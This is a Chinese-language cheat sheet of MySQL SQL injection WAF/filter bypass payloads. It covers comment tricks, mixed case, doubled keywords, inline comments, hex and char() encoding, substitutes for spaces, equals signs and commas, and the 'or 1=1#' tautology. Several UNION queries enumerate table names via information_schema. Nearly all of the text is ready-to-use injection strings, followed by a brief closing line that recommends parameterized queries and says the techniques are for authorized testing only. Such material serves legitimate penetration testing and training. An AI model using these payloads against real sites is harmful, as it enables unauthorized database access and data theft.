一、绕过策略(以下示例以 MySQL 为准:# 注释、/*! */ 内联注释、0x 十六进制字面量、rlike 等均为 MySQL 特性,在其他数据库上不一定可用)
1.常用注释符
--+(URL 参数中的 + 会被解码为空格,MySQL 要求 -- 后必须跟空白字符)、-- 后接空格、/**/、#(仅 MySQL)
2.大小写绕过
select * from admin where id=1;
select * from admin where id=1 uNiOn seLeCt 1,2,3;
3.双写绕过
select * from admin where id=1;
select * from admin where id=1 UniunionON select 1,2,3;
4.内联注释绕过
select * from admin where id=1;
select * from admin where id=1 union /*!select*/ 1,2,3;
5.单引号过滤
select * from admin where id=1;
select * from admin where id=1 union select 1,concat(table_name) from information_schema.tables where table_schema='sqli';
①16进制绕过:将字符串 sqli 转换为对应的 16 进制(s=73 q=71 l=6c i=69),MySQL 会把 0x 字面量当作字符串比较
select * from admin where id=1 union select 1,concat(table_name) from information_schema.tables where table_schema=0x73716c69;
②char函数绕过(注意 MySQL 中 + 是数值加法而不是字符串拼接,应使用 char(a,b,c,...) 或 concat() 拼接)
select * from admin where id=1 union select 1,concat(table_name) from information_schema.tables where table_schema=char(115,113,108,105);
6.空格过滤
select * from admin where id=1;
①括号绕过(查什么、在哪查、条件)
select(*)from(admin)where(id=1);
②注释绕过
select/**/*/**/from/**/admin/**/where/**/id=1;
③其他空格字符绕过
tab(%09)、换行(%0a)、回车(%0d)、垂直制表符(%0b)、换页(%0c)
7.等号过滤
select * from admin where username='admin';
①like or rlike
select * from admin where username like 'admin';
select * from admin where username rlike 'admin';
②between and
select * from admin where username between 'admin' and 'admin';
③regexp
select * from admin where username regexp 'admin';
8.逗号过滤
①select substr('admin',1,1);
select substr('admin' from 1 for 1);
②select * from admin limit 0,1;
select * from admin limit 1 offset 0;
二、
or 1=1# :可用于返回表中的所有行(记录),因为 where 条件永远为真,# 把后面的语句注释掉。防御角度:上述每一种绕过都说明基于关键字黑名单的过滤不可靠,应使用参数化查询/预编译语句并按最小权限配置数据库账号;本文技术仅用于授权测试。